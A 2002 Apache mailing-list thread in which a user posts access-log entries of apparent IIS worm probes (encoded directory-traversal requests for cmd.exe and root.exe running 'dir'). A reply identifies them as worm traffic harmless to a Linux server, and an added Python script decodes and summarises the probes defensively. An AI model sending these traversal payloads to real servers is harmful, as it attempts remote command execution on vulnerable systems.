Posted to users@httpd.apache.org by "Jack L. Stone" <ja...@sage-one.net> on 2002/07/28 18:01:34 UTC

Re: Am I being probed?

At 06:03 PM 7.28.2002 +0200, eric wrote:
>Greetings!
>
>I'm a newbie when it comes to many *nix things and Apache is one of them.  
>
>I have two machines, one running Suse 8.0 and the other running WinME.  Both 
>of them are hooked up to a LinkSys EtherFast DSL router.  My Suse box is 
>running Apache 2.0.39.
>
>I use WinMe to connect to the web server.  It's address is 192.168.1.100 and 
>the Suse box is 192.168.1.101.
>
>I was going through my Apache access log and found these entries:
>
>217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET
>/scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>and there's a few more.
>
>What's going on here?  Is there anyway I can find out?  Should I bother?  
>Should I care?
>
>Thanks, Eric
>
You would only need to care if you were running a WIN server... it is
probably the "script kiddies" trying to wreak some havoc by trying to run
their scripts (worm) on yours/any machine in its search on the net....

Best regards,
Jack L. Stone,
Administrator

SageOne Net
http://www.sage-one.net
jackstone@sage-one.net

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
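
Added example (not part of the original thread): a Python check of the point made in the reply above, run over a few of the quoted log entries. It groups requests for cmd.exe/root.exe by source address, decodes the nested percent-encoding, and confirms that none of them received a 2xx response. The function names and the final 192.168.1.100 entry are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "method target proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')
# Windows/IIS-only executables requested in the thread's log lines
IIS_TARGET = re.compile(r"(cmd|root)\.exe", re.I)

def decode_repeatedly(path, rounds=3):
    """Percent-decode until stable so nested encodings (%255c, then %5c) surface."""
    for _ in range(rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path

def summarize(lines):
    """Per source IP: probe count, status codes seen, traversal attempts, any 2xx."""
    report = defaultdict(
        lambda: {"probes": 0, "statuses": set(), "traversal": 0, "served": False})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not a well-formed access-log entry
        host, target, status = m.groups()
        path = decode_repeatedly(target.split("?", 1)[0])
        if not IIS_TARGET.search(path):
            continue  # ordinary request, not one of these probes
        entry = report[host]
        entry["probes"] += 1
        entry["statuses"].add(int(status))
        entry["traversal"] += ".." in path
        entry["served"] |= status.startswith("2")
    return dict(report)

# Entries re-joined from the thread; the last line is constructed (a normal LAN hit).
SAMPLE = [
    '217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 787',
    '217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787',
    '217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720',
    '80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787',
    '192.168.1.100 - - [28/Jul/2002:14:00:00 +0200] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        print(host, info)
```

A source whose "served" field comes back True is the case that deserves a closer look; with only 404 and 400 responses, as in the log above, the requests found nothing to run.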


Re: Am I being probed?

Posted by eric <er...@t-online.de>.
Jack,

Thanks!
